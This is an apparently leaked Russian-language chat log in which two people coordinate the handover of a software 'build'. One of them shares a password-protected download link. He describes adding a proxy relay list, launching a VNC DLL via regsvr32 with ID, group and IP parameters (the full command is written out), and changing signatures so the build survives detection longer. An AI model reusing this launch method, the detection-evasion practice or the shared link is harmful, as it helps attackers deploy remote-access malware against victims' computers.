[26.11.21 21:15:16] angelo:		обычно
[26.11.21 21:16:57] grem:		обычно в 10-12 по МСК
А сейчас после не большего переезда буквально сегодня вошел в рабочий ритм
чет всю неделю не мог включится в работу
[26.11.21 21:17:17] angelo:		не ты один поверь
[26.11.21 21:17:24] angelo:		может на Пн ?
[26.11.21 21:17:39] angelo:		мне вставать в 8 утра
[26.11.21 21:17:42] angelo:		если не раньше
[26.11.21 21:18:19] angelo:		приходи раньше 12 )
[26.11.21 21:18:22] angelo:		в Пн
[26.11.21 21:18:22] grem:		сборку могу сейчас передать
[26.11.21 21:18:29] angelo:		окай
[26.11.21 21:18:37] grem:		только кое-что поправлю
[26.11.21 21:36:06] angelo:		если что я тут
[26.11.21 21:36:27] grem:		ок
[26.11.21 21:44:36] grem:		```
Download: https://qaz.im/load/4StEsk/k2diar
Delete: https://qaz.im/index.php?a=delete&q=918105370
Password: iX47(bT38B1hW35#
```
[26.11.21 21:45:21] angelo:		поймал
[26.11.21 21:45:23] angelo:		спс
[26.11.21 21:45:29] angelo:		проверю в выходные
[26.11.21 21:46:22] grem:		там 2 основных изменения:
передача портов со списком прокладок 
и запуск через regsvr32 с параметрами
[26.11.21 21:47:19] angelo:		записал
[26.11.21 21:48:03] grem:		Еще убрал проверку на получение ip первого сетевого интерфейса, возможно в ней дело, а так сигнатуры маленько изменились, может будет жить продолжительное время
[26.11.21 21:48:31] angelo:		записал то слова
[26.11.21 21:51:12] grem:		> передача портов со списком прокладок 
то есть можно вводить 127.0.0.1:80,192.168.49.77:443 и т.д.
>и запуск через regsvr32 с параметрами
regsvr32 /i:"--id id --group group --ip 127.0.0.1:80,192.168.49.77:443" VNCSRV.dll
[26.11.21 21:51:43] angelo:		ага понял
[26.11.21 21:51:51] angelo:		вроде как понял
[26.11.21 21:52:16] grem:		про regsvr32 недавно collin спрашивал, не знаю предусмотрен ли запуск в bk
[26.11.21 21:52:45] angelo:		проверим
[26.11.21 21:52:50] angelo:		сейчас точно не буду
[26.11.21 21:52:56] angelo:		да и он нужен
[26.11.21 21:52:59] angelo:		ещё что-то ?
[26.11.21 21:53:10] grem:		все пока
[26.11.21 21:53:19] angelo:		спасибо !
[26.11.21 21:53:22] angelo:		доборой ночи !
[26.11.21 21:53:29] angelo:		до Понидельника
[26.11.21 21:53:37] grem:		споки
[26.11.21 21:53:50] angelo:		пок !
[26.11.21 21:55:18] grem:		>про regsvr32 недавно collin спрашивал, не знаю предусмотрен ли запуск в bk
точнее это вероятней всего можно, но как именно запускается не знаю
[26.11.21 21:55:28] angelo:		узнаем )
[29.12.21 13:14:11] angelo:		))))))))))
